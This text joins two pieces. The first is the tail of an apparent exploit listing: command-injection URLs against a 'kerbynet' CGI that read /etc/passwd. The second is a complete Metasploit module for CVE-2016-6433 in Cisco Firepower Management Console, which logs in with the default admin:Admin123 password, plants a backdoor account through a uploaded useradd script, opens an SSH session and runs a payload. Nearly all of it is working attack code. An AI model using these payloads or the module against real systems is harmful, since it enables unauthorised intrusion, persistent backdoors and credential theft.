http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27
METHOD
Get
PARAMETER
x509type
PAYLOAD
%27%26cat%20/etc/passwd%26%27
####################################################################################################################################
RCE 3
URL
http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22
METHOD
Get
PARAMETER
type
PAYLOAD
%22%26cat%20/etc/passwd%26%22
####################################################################################################################################
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Cisco Firepower Management Console.
The management system contains a configuration flaw that allows the www user to
execute the useradd binary, which can be abused to create backdoor accounts.
Authentication is required to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt', # Original discovery & PoC
'sinn3r' # Metasploit module
],
'References' =>
[
[ 'CVE', '2016-6433' ],
[ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 10 2016',
'CmdStagerFlavor'=> %w{ echo },
'DefaultOptions' =>
{
'SSL' => 'true',
'SSLVersion' => 'Auto',
'RPORT' => 443
},
'DefaultTarget' => 0))
register_options(
[
# admin:Admin123 is the default credential for 6.0.1
OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),
OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),
OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])
], self.class)
end
def check
# For this exploit to work, we need to check two services:
# * HTTP - To create the backdoor account for SSH
# * SSH - To execute our payload
vprint_status('Checking Cisco Firepower Management console...')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')
})
if res && res.code == 200
vprint_status("Console is found.")
vprint_status("Checking SSH service.")
begin
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(rhost, 'admin',
port: datastore['SSHPORT'],
password: Rex::Text.rand_text_alpha(5),
auth_methods: ['password'],
non_interactive: true
)
end
rescue Timeout::Error
vprint_error('The SSH connection timed out.')
return Exploit::CheckCode::Unknown
rescue Net::SSH::AuthenticationFailed
# Hey, it talked. So that means SSH is running.
return Exploit::CheckCode::Appears
rescue Net::SSH::Exception => e
vprint_error(e.message)
end
end
Exploit::CheckCode::Safe
end
def get_sf_action_id(sid)
requirements = {}
print_status('Attempting to obtain sf_action_id from rulesimport.cgi')
uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'cookie' => "CGISESSID=#{sid}"
})
unless res
fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')
end
sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]
unless sf_action_id
fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')
end
sf_action_id
end
def create_ssh_backdoor(sid, user, pass)
uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
sf_action_id = get_sf_action_id(sid)
sh_name = 'exploit.sh'
print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")
mime_data = Rex::MIME::Message.new
mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')
mime_data.add_part('file', nil, nil, 'form-data; name="source"')
mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')
mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')
mime_data.add_part(
"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",
'application/octet-stream',
nil,
"form-data; name=\"file\"; filename=\"#{sh_name}\""
)
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => "CGISESSID=#{sid}",
'ctype' => "multipart/form-data; boundary=#{mime_data.bound}",
'data' => mime_data.to_s,
'vars_get' => { 'no_mojo' => '1' },
})
end
def generate_new_username
datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)
end
def generate_new_password
datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)
end
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: 'cisco',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def do_login
console_user = datastore['USERNAME']
console_pass = datastore['PASSWORD']
uri = normalize_uri(target_uri.path, 'login.cgi')
print_status("Attempting to login in as #{console_user}:#{console_pass}")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'username' => console_user,
'password' => console_pass,
'target' => ''
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
end
res_cookie = res.get_cookies
if res.code == 302 && res_cookie.include?('CGISESSID')
cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
print_status("CGI Session ID: #{cgi_sid}")
print_good("Authenticated as #{console_user}:#{console_pass}")
report_cred(username: console_user, password: console_pass)
return cgi_sid
end
nil
end
def execute_command(cmd, opts = {})
@first_exec = true
cmd.gsub!(/\/tmp/, '/usr/tmp')
# Weird hack for the cmd stager.
# Because it keeps using > to write the payload.
if @first_exec
@first_exec = false
else
cmd.gsub!(/>>/, ' > ')
end
begin
Timeout.timeout(3) do
@ssh_socket.exec!("#{cmd}\n")
vprint_status("Executing #{cmd}")
end
rescue Timeout::Error
fail_with(Failure::Unknown, 'SSH command timed out')
rescue Net::SSH::ChannelOpenFailed
print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')
retry
end
end
def init_ssh_session(user, pass)
print_status("Attempting to log into SSH as #{user}:#{pass}")
factory = ssh_socket_factory
opts = {
auth_methods: ['password', 'keyboard-interactive'],
port: datastore['SSHPORT'],
use_agent: false,
config: false,
password: pass,
proxy: factory,
non_interactive: true
}
opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
@ssh_socket = Net::SSH.start(rhost, user, opts)
end
rescue Net::SSH::Exception => e
fail_with(Failure::Unknown, e.message)
end
end
def exploit
# To exploit the useradd vuln, we need to login first.
sid = do_login
return unless sid
# After login, we can call the useradd utility to create a backdoor user
new_user = generate_new_username
new_pass = generate_new_password
create_ssh_backdoor(sid, new_user, new_pass)
# Log into the SSH backdoor account
init_ssh_session(new_user, new_pass)
begin
execute_cmdstager({:linemax => 500})
ensure
@ssh_socket.close
end
end
end